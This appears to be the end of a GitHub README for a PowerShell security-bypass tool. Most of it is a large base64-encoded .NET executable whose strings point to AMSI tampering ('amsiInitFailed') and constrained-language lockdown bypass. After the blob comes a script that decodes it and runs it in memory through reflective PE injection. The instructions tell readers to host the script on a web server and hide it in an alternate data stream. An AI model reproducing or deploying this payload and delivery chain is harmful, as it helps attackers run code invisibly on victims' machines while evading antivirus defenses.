AEUAOABBAFQAZwBBADUAQQBFADQAQQBVAEEAQgBZAEEASABBAEEAWgBBAEEAeQBBAEgAVQBBAFIAZwBCAGwAQQBIAEkAQQBRAHcAQQB5AEEASABrAEEATgBRAEIASQBBAEcAbwBBAGUAQQBCAHIAQQBHADgAQQBTAEEAQgBUAEEARwBnAEEAVwBRAEIAbwBBAEQAYwBBAFoAUQBBAHoAQQBFAHcAQQBTAHcAQgBOAEEASABvAEEAZAB3AEEAMABBAEcAOABBAFQAUQBCADMAQQBIAEUAQQBXAEEAQgBhAEEARABnAEEATQB3AEEAeABBAEUAdwBBAGMAdwBCAEYAQQBGAGcAQQBTAHcAQgBOAEEARABnAEEAUgBBAEIAUgBBAEQAawBBAEsAdwBCADAAQQBHADQAQQBWAGcAQgBVAEEARwBrAEEATgBRAEIARgBBAEgAVQBBAGUAUQBCAG0AQQBIAE0AQQBTAFEAQgBuAEEARwBVAEEAWQBRAEIANgBBAEgAWQBBAE4AZwBCAHQAQQBIAE0AQQBaAFEAQgBNAEEARABZAEEAWQB3AEIAUgBBAEcAZwBBAGIAUQBCAEwAQQBHAFUAQQBXAGcAQgB5AEEASABFAEEATgBBAEIAagBBAEUASQBBAE0AQQBCAGkAQQBFAG8AQQBlAFEAQgBXAEEASABJAEEATQBnAEIAMABBAEcAawBBAGQAUQBCAEsAQQBEAGsAQQBaAFEAQgBFAEEARwBrAEEATQBBAEEAMwBBAEgAWQBBAFkAdwBCADIAQQBFAFEAQQBjAEEAQgBUAEEAQwA4AEEATwBRAEIAVQBBAEcAWQBBAE8AUQBCAEMAQQBIAEUAQQBNAGcAQgA1AEEASABZAEEAUgBBAEIAcABBAEgASQBBAGIAQQBBADUAQQBEAFEAQQBVAFEAQgAwAEEASABnAEEAVQBnAEIAawBBAEYAQQBBAFoAUQBCAHAAQQBHAGsAQQBTAFEAQgB6AEEARQBnAEEATQBBAEEAcgBBAEMAcwBBAFQAdwBCAEcAQQBHADQAQQBSAEEAQQB2AEEARQB3AEEATAB3AEEAeQBBAEYAZwBBAE0AQQBCAHAAQQBEAFkAQQBkAGcAQgBWAEEARABjAEEAVQBRAEEAMgBBAEgAWQBBAFkAdwBBADMAQQBIAFkAQQBXAEEAQQA1AEEARQA4AEEAWgBRAEIAegBBAEUAZwBBAFIAZwBBADEAQQBHAEUAQQBRAFEAQgBXAEEARQBRAEEAUwB3AEEAMQBBAEQAYwBBAGMAZwBCAFoAQQBHAEUAQQBWAEEAQQA0AEEASABFAEEAYQBnAEIANABBAEMAOABBAFcAZwBBADUAQQBFAG8AQQBXAGcAQgB5AEEARwAwAEEAYQB3AEIAVQBBAEcAUQBBAGUAZwBBADAAQQBIAGcAQQBSAEEAQgBPAEEARABjAEEATAB3AEIAagBBAEUANABBAGQAQQBCAFQAQQBEAE0AQQBWAEEAQQAyAEEARwBZAEEATAB3AEIANQBBAEgAUQBBAEwAdwBCAFAAQQBHADQAQQBiAEEAQgBuAEEASABnAEEATAB3AEIASQBBAEcAWQBBAGQAZwBCAHEAQQBGAEUAQQBaAGcAQgBqAEEASABrAEEAYwBRAEIAdQBBAEYATQBBAFQAZwBCADQAQQBFAE0AQQBkAFEAQQA0AEEASABFAEEAYgBRAEIAVwBBAEgAQQBBAE8AQQBCAG0AQQBIAEEAQQBWAEEAQgBNAEEASABjAEEASwB3AEIAVwBBAEcAWQBBAGEAZwBBAHIAQQBHAFUAQQBaAGcAQgB0AEEASABNAEEAVgBBAEIATQBBAEUAVQBBAGQAUQBCAEoAQQBFAGsAQQBjAHcAQQAxAEEARABFAEEAZQBRAEIAUABBAEgAUQBBAFkAZwBBADMAQQBHAFEAQQBjAGcAQgBsAEEARgBBAEEAZABnAEIAWgBBAEUAbwBBAFEAdwBBADMAQQBFADgAQQBTAEEAQgBWAEEASABBAEEAVgBBAEIAcABBAEgASQBBAFUAdwBCAFQAQQBIAGcAQQBXAFEAQgB3AEEARQA0AEEAVwBnAEEAMwBBAEYAZwBBAFQAQQBCAHMAQQBGAGMAQQBRAGcAQgBRAEEARABnAEEAVABBAEEAeABBAEYARQBBAFUAdwBBADMAQQBIAGcAQQBhAGcAQgBUAEEARwBJAEEAWQB3AEEAMABBAEgAUQBBAFoAUQBCAG0AQQBFAGMAQQBkAHcAQgBIAEEARABFAEEATQB3AEIANQBBAEcASQBBAFMAQQBCAFcAQQBGAG8AQQBPAEEAQQB2AEEARgBVAEEAYwB3AEEAMABBAEYAQQBBAFIAdwBBAHkAQQBEAFkAQQBlAGcAQQA0AEEARQBzAEEAVgBnAEIASwBBAEUAdwBBAFYAdwBCAHUAQQBGAGsAQQBiAHcAQgBEAEEARgBVAEEAVgBnAEIASgBBAEQAZwBBAGMAZwBCAEcAQQBGAGMAQQBkAGcAQgAwAEEARQBrAEEATwBRAEIAagBBAEcAawBBAGMAUQBBAHYAQQBEAGcAQQBRAFEAQQBuAEEAQwBrAEEATABBAEIAYgBBAEUAawBBAFQAdwBBAHUAQQBFAE0AQQBiAHcAQgB0AEEASABBAEEAYwBnAEIAbABBAEgATQBBAGMAdwBCAHAAQQBHADgAQQBiAGcAQQB1AEEARQBNAEEAYgB3AEIAdABBAEgAQQBBAGMAZwBCAGwAQQBIAE0AQQBjAHcAQgBwAEEARwA4AEEAYgBnAEIATgBBAEcAOABBAFoAQQBCAGwAQQBGADAAQQBPAGcAQQA2AEEARQBRAEEAWgBRAEIAagBBAEcAOABBAGIAUQBCAHcAQQBIAEkAQQBaAFEAQgB6AEEASABNAEEASwBRAEEAcABBAEMAdwBBAFcAdwBCAFUAQQBHAFUAQQBlAEEAQgAwAEEAQwA0AEEAUgBRAEIAdQBBAEcATQBBAGIAdwBCAGsAQQBHAGsAQQBiAGcAQgBuAEEARgAwAEEATwBnAEEANgBBAEUARQBBAFUAdwBCAEQAQQBFAGsAQQBTAFEAQQBwAEEAQwBrAEEATABnAEIAUwBBAEcAVQBBAFkAUQBCAGsAQQBGAFEAQQBiAHcAQgBGAEEARwA0AEEAWgBBAEEAbwBBAEMAawBBAABrUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAFQAcgBhAGMAaQBuAGcALgBQAFMARQB0AHcATABvAGcAUAByAG8AdgBpAGQAZQByAAAXZQB0AHcAUAByAG8AdgBpAGQAZQByAABNUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAAAdYQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAAApcwB5AHMAdABlAG0ATABvAGMAawBkAG8AdwBuAFAAbwBsAGkAYwB5AAAAAMGOk0L88YNK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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='
 
function Invoke-ReflectivePEInjection
 
{
 
<#
Copy / paste the entire Invoke-RelectivePEInjection.ps1 script here
#>
 
}
 
#Decode the $ExeBytes
$PEBytes = [System.Convert]::FromBase64String($ExeBytes)
 
#Inject The exe in memory and run it with Invoke-RelfectivePEInjection
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4"

Now host this script on your web server and use the Invoke-ADS.ps1 POC to download and embed the script into an ADS and execute or use another method of your choice.

The options here are as broad and varied as your imagination.

About

No description, website, or topics provided.

Resources

Readme

License

GPL-3.0 license
Activity

Stars

12 stars

Watchers

4 watching

Forks

6 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages